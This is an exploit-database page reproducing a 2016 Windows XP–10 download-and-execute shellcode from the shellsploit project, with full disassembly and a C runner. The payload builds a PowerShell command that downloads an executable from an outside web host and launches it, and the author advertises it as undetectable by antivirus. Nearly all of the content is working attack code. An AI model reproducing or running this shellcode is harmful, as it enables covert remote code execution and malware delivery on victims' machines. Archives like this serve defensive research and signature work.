Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Windows XP - 10 - Download & Execute Shellcode

🗓️ 20 Jun 2016 00:00:00Reported by B3mB4mType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 33 Views

Windows XP - Download & Execute Shellcode on Multiple Windows Version

Code
/*
[+] Author  : B3mB4m
[~] Contact : [email protected]
[~] Project : https://github.com/b3mb4m/shellsploit-framework
[~] Greetz  : Bomberman,T-Rex,Pixi
-----------------------------------------------------------

Tested on : 
    Windows XP/SP3 x86
    Windows 7 Ultimate x64  
    Windows 8.1 Pro Build 9600 x64
    Windows 10 Home x64


* This source belongs to shellsploit project under MIT licence.

* If you convert it an executable file, its will be FUD(without any encrypt).
 	-PoC : https://nodistribute.com/result/qwxU3DmFCR2M0OrQt



	0x0:	31c9			xor ecx, ecx
	0x2:	b957696e45		mov ecx, 0x456e6957
	0x7:	eb04			jmp 0xd
	0x9:	31c9			xor ecx, ecx
	0xb:	eb00			jmp 0xd
	0xd:	31c0			xor eax, eax
	0xf:	31db			xor ebx, ebx
	0x11:	31d2			xor edx, edx
	0x13:	31ff			xor edi, edi
	0x15:	31f6			xor esi, esi
	0x17:	648b7b30		mov edi, dword ptr fs:[ebx + 0x30]
	0x1b:	8b7f0c			mov edi, dword ptr [edi + 0xc]
	0x1e:	8b7f1c			mov edi, dword ptr [edi + 0x1c]
	0x21:	8b4708			mov eax, dword ptr [edi + 8]
	0x24:	8b7720			mov esi, dword ptr [edi + 0x20]
	0x27:	8b3f			mov edi, dword ptr [edi]
	0x29:	807e0c33		cmp byte ptr [esi + 0xc], 0x33
	0x2d:	75f2			jne 0x21
	0x2f:	89c7			mov edi, eax
	0x31:	03783c			add edi, dword ptr [eax + 0x3c]
	0x34:	8b5778			mov edx, dword ptr [edi + 0x78]
	0x37:	01c2			add edx, eax
	0x39:	8b7a20			mov edi, dword ptr [edx + 0x20]
	0x3c:	01c7			add edi, eax
	0x3e:	89dd			mov ebp, ebx
	0x40:	81f957696e45	cmp ecx, 0x456e6957
	0x46:	0f8530010000	jne 0x17c
	0x4c:	8b34af			mov esi, dword ptr [edi + ebp*4]
	0x4f:	01c6			add esi, eax
	0x51:	45				inc ebp
	0x52:	390e			cmp dword ptr [esi], ecx
	0x54:	75f6			jne 0x4c
	0x56:	8b7a24			mov edi, dword ptr [edx + 0x24]
	0x59:	01c7			add edi, eax
	0x5b:	668b2c6f		mov bp, word ptr [edi + ebp*2]
	0x5f:	8b7a1c			mov edi, dword ptr [edx + 0x1c]
	0x62:	01c7			add edi, eax
	0x64:	8b7caffc		mov edi, dword ptr [edi + ebp*4 - 4]
	0x68:	01c7			add edi, eax
	0x6a:	89d9			mov ecx, ebx
	0x6c:	b1ff			mov cl, 0xff
	0x6e:	53				push ebx
	0x6f:	e2fd			loop 0x6e
	0x71:	68293b7d22		push 0x227d3b29
	0x76:	6865786527		push 0x27657865
	0x7b:	687474792e		push 0x2e797474
	0x80:	6828277075		push 0x75702728
	0x85:	6863757465		push 0x65747563
	0x8a:	686c457865		push 0x6578456c
	0x8f:	685368656c		push 0x6c656853
	0x94:	686f6e292e		push 0x2e296e6f
	0x99:	6863617469		push 0x69746163
	0x9e:	6870706c69		push 0x696c7070
	0xa3:	686c6c2e41		push 0x412e6c6c
	0xa8:	6820536865		push 0x65685320
	0xad:	682d636f6d		push 0x6d6f632d
	0xb2:	6865637420		push 0x20746365
	0xb7:	682d4f626a		push 0x6a624f2d
	0xbc:	68284e6577		push 0x77654e28
	0xc1:	682729203b		push 0x3b202927
	0xc6:	682e657865		push 0x6578652e
	0xcb:	6875747479		push 0x79747475
	0xd0:	682c202770		push 0x7027202c
	0xd5:	6865786527		push 0x27657865
	0xda:	687474792e		push 0x2e797474
	0xdf:	68362f7075		push 0x75702f36
	0xe4:	68742f7838		push 0x38782f74
	0xe9:	6861746573		push 0x73657461
	0xee:	6874792f6c		push 0x6c2f7974
	0xf3:	682f707574		push 0x7475702f
	0xf8:	687468616d		push 0x6d616874
	0xfd:	6873677461		push 0x61746773
	0x102:	686c692f7e		push 0x7e2f696c
	0x107:	687274682e		push 0x2e687472
	0x10c:	68652e6561		push 0x61652e65
	0x111:	682f2f7468		push 0x68742f2f
	0x116:	687470733a		push 0x3a737074
	0x11b:	6828276874		push 0x74682728
	0x120:	6846696c65		push 0x656c6946
	0x125:	686c6f6164		push 0x64616f6c
	0x12a:	68446f776e		push 0x6e776f44
	0x12f:	686e74292e		push 0x2e29746e
	0x134:	68436c6965		push 0x65696c43
	0x139:	682e576562		push 0x6265572e
	0x13e:	68204e6574		push 0x74654e20
	0x143:	686a656374		push 0x7463656a
	0x148:	68772d4f62		push 0x624f2d77
	0x14d:	6820284e65		push 0x654e2820
	0x152:	682226207b		push 0x7b202622
	0x157:	68616e6420		push 0x20646e61
	0x15c:	68636f6d6d		push 0x6d6d6f63
	0x161:	686c6c202d		push 0x2d206c6c
	0x166:	6872736865		push 0x65687372
	0x16b:	68706f7765		push 0x65776f70
	0x170:	89e2			mov edx, esp
	0x172:	41				inc ecx
	0x173:	51				push ecx
	0x174:	52				push edx
	0x175:	ffd7			call edi
	0x177:	e88dfeffff		call 9
	0x17c:	8b34af			mov esi, dword ptr [edi + ebp*4]
	0x17f:	01c6			add esi, eax
	0x181:	45				inc ebp
	0x182:	813e45786974	cmp dword ptr [esi], 0x74697845
	0x188:	75f2			jne 0x17c
	0x18a:	817e0450726f63	cmp dword ptr [esi + 4], 0x636f7250
	0x191:	75e9			jne 0x17c
	0x193:	8b7a24			mov edi, dword ptr [edx + 0x24]
	0x196:	01c7			add edi, eax
	0x198:	668b2c6f		mov bp, word ptr [edi + ebp*2]
	0x19c:	8b7a1c			mov edi, dword ptr [edx + 0x1c]
	0x19f:	01c7			add edi, eax
	0x1a1:	8b7caffc		mov edi, dword ptr [edi + ebp*4 - 4]
	0x1a5:	01c7			add edi, eax
	0x1a7:	31c9			xor ecx, ecx
	0x1a9:	51				push ecx
	0x1aa:	ffd7			call edi
*/

#include<stdio.h>
 
char shellcode[]=\
 
"\x31\xc9\xb9\x57\x69\x6e\x45\xeb\x04\x31\xc9\xeb\x00\x31\xc0\x31\xdb\x31\xd2\x31\xff\x31\xf6\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x81\xf9\x57\x69\x6e\x45\x0f\x85\x30\x01\x00\x00\x8b\x34\xaf\x01\xc6\x45\x39\x0e\x75\xf6\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x29\x3b\x7d\x22\x68\x65\x78\x65\x27\x68\x74\x74\x79\x2e\x68\x28\x27\x70\x75\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x68\x6f\x6e\x29\x2e\x68\x63\x61\x74\x69\x68\x70\x70\x6c\x69\x68\x6c\x6c\x2e\x41\x68\x20\x53\x68\x65\x68\x2d\x63\x6f\x6d\x68\x65\x63\x74\x20\x68\x2d\x4f\x62\x6a\x68\x28\x4e\x65\x77\x68\x27\x29\x20\x3b\x68\x2e\x65\x78\x65\x68\x75\x74\x74\x79\x68\x2c\x20\x27\x70\x68\x65\x78\x65\x27\x68\x74\x74\x79\x2e\x68\x36\x2f\x70\x75\x68\x74\x2f\x78\x38\x68\x61\x74\x65\x73\x68\x74\x79\x2f\x6c\x68\x2f\x70\x75\x74\x68\x74\x68\x61\x6d\x68\x73\x67\x74\x61\x68\x6c\x69\x2f\x7e\x68\x72\x74\x68\x2e\x68\x65\x2e\x65\x61\x68\x2f\x2f\x74\x68\x68\x74\x70\x73\x3a\x68\x28\x27\x68\x74\x68\x46\x69\x6c\x65\x68\x6c\x6f\x61\x64\x68\x44\x6f\x77\x6e\x68\x6e\x74\x29\x2e\x68\x43\x6c\x69\x65\x68\x2e\x57\x65\x62\x68\x20\x4e\x65\x74\x68\x6a\x65\x63\x74\x68\x77\x2d\x4f\x62\x68\x20\x28\x4e\x65\x68\x22\x26\x20\x7b\x68\x61\x6e\x64\x20\x68\x63\x6f\x6d\x6d\x68\x6c\x6c\x20\x2d\x68\x72\x73\x68\x65\x68\x70\x6f\x77\x65\x89\xe2\x41\x51\x52\xff\xd7\xe8\x8d\xfe\xff\xff\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x45\x78\x69\x74\x75\xf2\x81\x7e\x04\x50\x72\x6f\x63\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x31\xc9\x51\xff\xd7";
 
main(){(* (int(*)()) shellcode)();}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Jun 2016 00:00Current
windows xpdownloadexecuteshellcodewindows 7windows 8.1windows 10x86x64
33